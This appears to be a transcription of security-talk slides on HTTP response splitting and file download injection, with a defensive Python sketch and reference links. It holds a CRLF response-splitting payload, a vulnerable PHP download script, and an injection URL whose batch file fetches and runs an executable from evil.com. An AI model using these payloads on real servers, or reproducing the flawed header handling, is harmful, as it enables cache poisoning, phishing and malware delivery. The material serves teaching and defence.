/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
Content-Type: text/html
Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/
Connection: Close

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>">http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html></a>.</p>
</body></html>
Why?
• Cache Poisoning
• Replace content
• Phishing
• XSS
• etc.
File Download Injection
A similar idea to response splitting.
We've all written download scripts:
download.php?file=report.xls
<?php
// The vulnerable script as shown on the slide: basename() strips any directory part,
// but CR/LF in the requested name still reach the Content-Disposition header line.
// The parameter is "file", matching the download.php?file=... URLs on the slide.
$filename = basename($_GET["file"]);
header('Content-Disposition: attachment; filename="' . $filename . '"');
readfile($filename);
return;
http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Path=/download
Content-Disposition: attachment;filename=attack.bat
Content-length: 88
Sensitive stuff in separate browser?
As a programmer:
Whitelist everything. Nothing gets through w/o you knowing.
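An added example, not from the slides: a small Python sketch that frames the naive redirect's output the way a proxy or browser would (one request turning into two responses, as in the Shazam example above) and puts the whitelist advice into code for both the lang parameter and the download filename. The regexes, the 400 fallback and the sample names are assumptions for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample: the lang value from the slide, URL-decoded so the CR/LFs are real bytes.
ATTACK_LANG = unquote(
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>"
)

def naive_redirect(lang: str) -> bytes:
    """Vulnerable redirect: the parameter is copied verbatim into the Location header."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            f"Location: http://10.1.1.1/by_lang.jsp?lang={lang}\r\n"
            "Content-Length: 0\r\n\r\n").encode()

def count_responses(stream: bytes) -> int:
    """Frame the stream like a proxy (status line, headers, Content-Length body); count messages."""
    count = 0
    while stream.startswith(b"HTTP/"):
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break
        length = 0
        for line in head.split(b"\r\n")[1:]:          # skip the status line
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip() or 0)
        if len(rest) < length:
            break
        count += 1
        stream = rest[length:]                         # whatever follows is the next message
    return count

# Whitelists (assumed for this example): only the characters each field legitimately needs,
# so CR, LF and anything else a header would misread can never get through.
LANG_RE = re.compile(r"[a-z]{2}(?:-[A-Z]{2})?")               # e.g. "en", "de-AT"
FILENAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:xls|pdf|csv)")

def safe_redirect(lang: str) -> bytes:
    """Hardened redirect: a value outside the whitelist never reaches a header."""
    if not LANG_RE.fullmatch(lang):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return naive_redirect(lang)

def safe_download_header(filename: str):
    """Hardened download header; returns None when the name fails the whitelist."""
    if not FILENAME_RE.fullmatch(filename):
        return None
    return f'Content-Disposition: attachment; filename="{filename}"'
```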
• http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
• http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
• http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
• http://www.breakingpointsystems.com/community/blog/clickjacking
• http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.davidairey.com/google-gmail-security-hijack/
• http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html